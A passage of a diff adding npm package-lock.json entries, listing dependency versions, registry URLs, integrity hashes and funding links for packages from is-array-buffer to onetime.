"https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-array-buffer": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/is-array-buffer/-/is-array-buffer-3.0.2.tgz", + "integrity": "sha512-y+FyyR/w8vfIRq4eQcM1EYgSTnmHXPqaF+IgzgraytCFq5Xh8lllDVmAZolPJiZttZLeFSINPYMaEJ7/vWUa1w==", + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.2.0", + "is-typed-array": "^1.1.10" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-bigint": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-bigint/-/is-bigint-1.0.4.tgz", + "integrity": "sha512-zB9CruMamjym81i2JZ3UMn54PKGsQzsJeo6xvN3HJJ4CAsQNB6iRutp2To77OfCNuoxspsIhzaPoO1zyCEhFOg==", + "dependencies": { + "has-bigints": "^1.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-boolean-object": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/is-boolean-object/-/is-boolean-object-1.1.2.tgz", + "integrity": "sha512-gDYaKHJmnj4aWxyj6YHyXVpdQawtVLHU5cb+eztPGczf6cjuTdwve5ZIEfgXqH4e57An1D1AKf8CZ3kYrQRqYA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-callable": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/is-callable/-/is-callable-1.2.7.tgz", + "integrity": "sha512-1BC0BVFhS/p0qtw6enp8e+8OD0UrK0oFLztSjNzhcKA3WDuJxxAPXzPuPtKkjEY9UUoEWlX/8fgKeu2S8i9JTA==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-ci": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/is-ci/-/is-ci-3.0.1.tgz", + "integrity": "sha512-ZYvCgrefwqoQ6yTyYUbQu64HsITZ3NfKX1lzaEYdkTDcfKzzCI/wthRRYKkdjHKFVgNiXKAKm65Zo1pk2as/QQ==", + "dependencies": { + "ci-info": "^3.2.0" + }, + "bin": { + "is-ci": "bin.js" + } + }, + "node_modules/is-date-object": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/is-date-object/-/is-date-object-1.0.5.tgz", + "integrity": "sha512-9YQaSxsAiSwcvS33MBk3wTCVnWK+HhF8VZR2jRxehM16QcVOdHqPn4VPHmRK4lSr38n9JriurInLcP90xsYNfQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-fullwidth-code-point": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-installed-globally": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/is-installed-globally/-/is-installed-globally-0.4.0.tgz", + "integrity": "sha512-iwGqO3J21aaSkC7jWnHP/difazwS7SFeIqxv6wEtLU8Y5KlzFTjyqcSIT0d8s4+dDhKytsk9PJZ2BkS5eZwQRQ==", + "dependencies": { + "global-dirs": "^3.0.0", + "is-path-inside": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-map": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-map/-/is-map-2.0.2.tgz", + "integrity": "sha512-cOZFQQozTha1f4MxLFzlgKYPTyj26picdZTx82hbc/Xf4K/tZOOXSCkMvU4pKioRXGDLJRn0GM7Upe7kR721yg==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-number-object": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-number-object/-/is-number-object-1.0.7.tgz", + "integrity": "sha512-k1U0IRzLMo7ZlYIfzRu23Oh6MiIFasgpb9X76eqfFZAqwH44UI4KTBvBYIZ1dSL9ZzChTB9ShHfLkR4pdW5krQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-path-inside": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", + "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-regex": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/is-regex/-/is-regex-1.1.4.tgz", + "integrity": "sha512-kvRdxDsxZjhzUX07ZnLydzS1TU/TJlTUHHY4YLL87e37oUA49DfkLqgy+VjFocowy29cKvcSiu+kIv728jTTVg==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-set": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-set/-/is-set-2.0.2.tgz", + "integrity": "sha512-+2cnTEZeY5z/iXGbLhPrOAaK/Mau5k5eXq9j14CpRTftq0pAJu2MwVRSZhyZWBzx3o6X795Lz6Bpb6R0GKf37g==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-shared-array-buffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-shared-array-buffer/-/is-shared-array-buffer-1.0.2.tgz", + "integrity": "sha512-sqN2UDu1/0y6uvXyStCOzyhAjCSlHceFoMKJW8W9EU9cvic/QdsZ0kEU93HEy3IUEFZIiH/3w+AH/UQbPHNdhA==", + "dependencies": { + "call-bind": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-stream": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", + "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-string": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-string/-/is-string-1.0.7.tgz", + "integrity": "sha512-tE2UXzivje6ofPW7l23cjDOMa09gb7xlAqG6jG5ej6uPV32TlWP3NKPigtaGeHNu9fohccRYvIiZMfOOnOYUtg==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-symbol": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-symbol/-/is-symbol-1.0.4.tgz", + "integrity": "sha512-C/CPBqKWnvdcxqIARxyOh4v1UUEOCHpgDa0WYgpKDFMszcrPcffg5uhwSgPCLD2WWxmq6isisz87tzT01tuGhg==", + "dependencies": { + "has-symbols": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typed-array": { + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/is-typed-array/-/is-typed-array-1.1.12.tgz", + "integrity": "sha512-Z14TF2JNG8Lss5/HMqt0//T9JeHXttXy5pH/DBU4vi98ozO2btxzq9MwYDZYnKwU8nRsz/+GVFVRDq3DkVuSPg==", + "dependencies": { + "which-typed-array": "^1.1.11" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typedarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", + "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" + }, + "node_modules/is-unicode-supported": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/is-unicode-supported/-/is-unicode-supported-0.1.0.tgz", + "integrity": "sha512-knxG2q4UC3u8stRGyAVJCOdxFmv5DZiRcdlIaAQXAbSfJya+OhopNotLQrstBhququ4ZpuKbDc/8S6mgXgPFPw==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-weakmap": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-weakmap/-/is-weakmap-2.0.1.tgz", + "integrity": "sha512-NSBR4kH5oVj1Uwvv970ruUkCV7O1mzgVFO4/rev2cLRda9Tm9HrL70ZPut4rOHgY0FNrUu9BCbXA2sdQ+x0chA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakset": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-weakset/-/is-weakset-2.0.2.tgz", + "integrity": "sha512-t2yVvttHkQktwnNNmBQ98AhENLdPUTDTE21uPqAQ0ARwQfGeQKRVS0NNurH7bTf7RrvcVn1OOge45CnBeHCSmg==", + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/isarray": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-2.0.5.tgz", + "integrity": "sha512-xHjhDr3cNBK0BzdUJSPXZntQUx/mwMS5Rw4A7lPJ90XGAO6ISP/ePDNuo0vhqOZU+UD5JoodwCAAoZQd3FeAKw==" + }, + "node_modules/isexe": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + }, + "node_modules/isomorphic-git": { + "version": "1.25.10", + "resolved": "https://registry.npmjs.org/isomorphic-git/-/isomorphic-git-1.25.10.tgz", + "integrity": "sha512-IxGiaKBwAdcgBXwIcxJU6rHLk+NrzYaaPKXXQffcA0GW3IUrQXdUPDXDo+hkGVcYruuz/7JlGBiuaeTCgIgivQ==", + "dependencies": { + "async-lock": "^1.4.1", + "clean-git-ref": "^2.0.1", + "crc-32": "^1.2.0", + "diff3": "0.0.3", + "ignore": "^5.1.4", + "minimisted": "^2.0.0", + "pako": "^1.0.10", + "pify": "^4.0.1", + "readable-stream": "^3.4.0", + "sha.js": "^2.4.9", + "simple-get": "^4.0.1" + }, + "bin": { + "isogit": "cli.cjs" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/isomorphic-git/node_modules/pify": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/pify/-/pify-4.0.1.tgz", + "integrity": "sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==", + "engines": { + "node": ">=6" + } + }, + "node_modules/isomorphic-textencoder": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/isomorphic-textencoder/-/isomorphic-textencoder-1.0.1.tgz", + "integrity": "sha512-676hESgHullDdHDsj469hr+7t3i/neBKU9J7q1T4RHaWwLAsaQnywC0D1dIUId0YZ+JtVrShzuBk1soo0+GVcQ==", + "dependencies": { + "fast-text-encoding": "^1.0.0" + } + }, + "node_modules/isstream": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", + "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" + }, + "node_modules/joi": { + "version": "17.13.1", + "resolved": "https://registry.npmjs.org/joi/-/joi-17.13.1.tgz", + "integrity": "sha512-vaBlIKCyo4FCUtCm7Eu4QZd/q02bWcxfUO6YSXAZOWF6gzcLBeba8kwotUdYJjDLW8Cz8RywsSOqiNJZW0mNvg==", + "dependencies": { + "@hapi/hoek": "^9.3.0", + "@hapi/topo": "^5.1.0", + "@sideway/address": "^4.1.5", + "@sideway/formula": "^3.0.1", + "@sideway/pinpoint": "^2.0.0" + } + }, + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + }, + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "dependencies": { + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/jsbn": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", + "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" + }, + "node_modules/json-schema": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" + }, + "node_modules/json-stringify-safe": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", + "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" + }, + "node_modules/jsonfile": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", + "dependencies": { + "universalify": "^2.0.0" + }, + "optionalDependencies": { + "graceful-fs": "^4.1.6" + } + }, + "node_modules/jsprim": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-2.0.2.tgz", + "integrity": "sha512-gqXddjPqQ6G40VdnI6T6yObEC+pDNvyP95wdQhkWkg7crHH3km5qP1FsOXEkzEQwnz6gz5qGTn1c2Y52wP3OyQ==", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + } + }, + "node_modules/just-debounce-it": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-debounce-it/-/just-debounce-it-1.1.0.tgz", + "integrity": "sha512-87Nnc0qZKgBZuhFZjYVjSraic0x7zwjhaTMrCKlj0QYKH6lh0KbFzVnfu6LHan03NO7J8ygjeBeD0epejn5Zcg==" + }, + "node_modules/just-once": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-once/-/just-once-1.1.0.tgz", + "integrity": "sha512-+rZVpl+6VyTilK7vB/svlMPil4pxqIJZkbnN7DKZTOzyXfun6ZiFeq2Pk4EtCEHZ0VU4EkdFzG8ZK5F3PErcDw==" + }, + "node_modules/lazy-ass": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/lazy-ass/-/lazy-ass-1.6.0.tgz", + "integrity": "sha512-cc8oEVoctTvsFZ/Oje/kGnHbpWHYBe8IAJe4C0QNc3t8uM/0Y8+erSz/7Y1ALuXTEZTMvxXwO6YbX1ey3ujiZw==", + "engines": { + "node": "> 0.8" + } + }, + "node_modules/listr2": { + "version": "3.14.0", + "resolved": "https://registry.npmjs.org/listr2/-/listr2-3.14.0.tgz", + "integrity": "sha512-TyWI8G99GX9GjE54cJ+RrNMcIFBfwMPxc3XTFiAYGN4s10hWROGtOg7+O6u6LE3mNkyld7RSLE6nrKBvTfcs3g==", + "dependencies": { + "cli-truncate": "^2.1.0", + "colorette": "^2.0.16", + "log-update": "^4.0.0", + "p-map": "^4.0.0", + "rfdc": "^1.3.0", + "rxjs": "^7.5.1", + "through": "^2.3.8", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=10.0.0" + }, + "peerDependencies": { + "enquirer": ">= 2.3.0 < 3" + }, + "peerDependenciesMeta": { + "enquirer": { + "optional": true + } + } + }, + "node_modules/lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + }, + "node_modules/lodash.once": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz", + "integrity": "sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg==" + }, + "node_modules/log-symbols": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/log-symbols/-/log-symbols-4.1.0.tgz", + "integrity": "sha512-8XPvpAA8uyhfteu8pIvQxpJZ7SYYdpUivZpGy6sFsBuKRY/7rQGavedeB8aK+Zkyq6upMFVL/9AW6vOYzfRyLg==", + "dependencies": { + "chalk": "^4.1.0", + "is-unicode-supported": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-update": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/log-update/-/log-update-4.0.0.tgz", + "integrity": "sha512-9fkkDevMefjg0mmzWFBW8YkFP91OrizzkW3diF7CpG+S2EYdy4+TVfGwz1zeF8x7hCx1ovSPTOE9Ngib74qqUg==", + "dependencies": { + "ansi-escapes": "^4.3.0", + "cli-cursor": "^3.1.0", + "slice-ansi": "^4.0.0", + "wrap-ansi": "^6.2.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-update/node_modules/slice-ansi": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", + "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/slice-ansi?sponsor=1" + } + }, + "node_modules/log-update/node_modules/wrap-ansi": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", + "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/lz-string": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/lz-string/-/lz-string-1.5.0.tgz", + "integrity": "sha512-h5bgJWpxJNswbU7qCrV0tIKQCaS3blPDrqKWx+QxzuzL1zGUzij9XCWLrSLsJPu5t+eWA/ycetzYAO5IOMcWAQ==", + "bin": { + "lz-string": "bin/bin.js" + } + }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/media-typer": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", + "integrity": "sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/merge-descriptors": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz", + "integrity": "sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==", + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/merge-stream": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==" + }, + "node_modules/methods": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz", + "integrity": "sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "dependencies": { + "mime-db": "1.52.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mimic-fn": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", + "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/minimisted": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/minimisted/-/minimisted-2.0.1.tgz", + "integrity": "sha512-1oPjfuLQa2caorJUM8HV8lGgWCc0qqAO1MNv/k05G4qslmsndV/5WdNZrqCiyqiz3wohia2Ij2B7w2Dr7/IyrA==", + "dependencies": { + "minimist": "^1.2.5" + } + }, + "node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/negotiator": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz", + "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/node-ensure": { + "version": "0.0.0", + "resolved": "https://registry.npmjs.org/node-ensure/-/node-ensure-0.0.0.tgz", + "integrity": "sha512-DRI60hzo2oKN1ma0ckc6nQWlHU69RH6xN0sjQTjMpChPfTYvKZdcQFfdYK2RWbJcKyUizSIy/l8OTGxMAM1QDw==" + }, + "node_modules/npm-run-path": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", + "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dependencies": { + "path-key": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/object-inspect": { + "version": "1.13.4", + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz", + "integrity": "sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-is": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/object-is/-/object-is-1.1.5.tgz", + "integrity": "sha512-3cyDsyHgtmi7I7DfSSI2LDp6SK2lwvtbg0p0R1e0RvTqF5ceGx+K2dfSjm1bKDMVCFEDAQvy+o8c6a7VujOddw==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-keys": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/object-keys/-/object-keys-1.1.1.tgz", + "integrity": "sha512-NuAESUOUMrlIXOfHKzD6bpPu3tYt3xvjNdRIQ+FeT0lNb4K8WR70CaDxhuNguS2XG+GjkyMwOzsN5ZktImfhLA==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object.assign": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/object.assign/-/object.assign-4.1.4.tgz", + "integrity": "sha512-1mxKf0e58bvyjSCtKYY4sRe9itRk3PJpquJOjeIkz885CczcI4IvJJDLPS72oowuSh+pBxUFROpX+TU++hxhZQ==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "has-symbols": "^1.0.3", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/onetime": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", + "integrity": 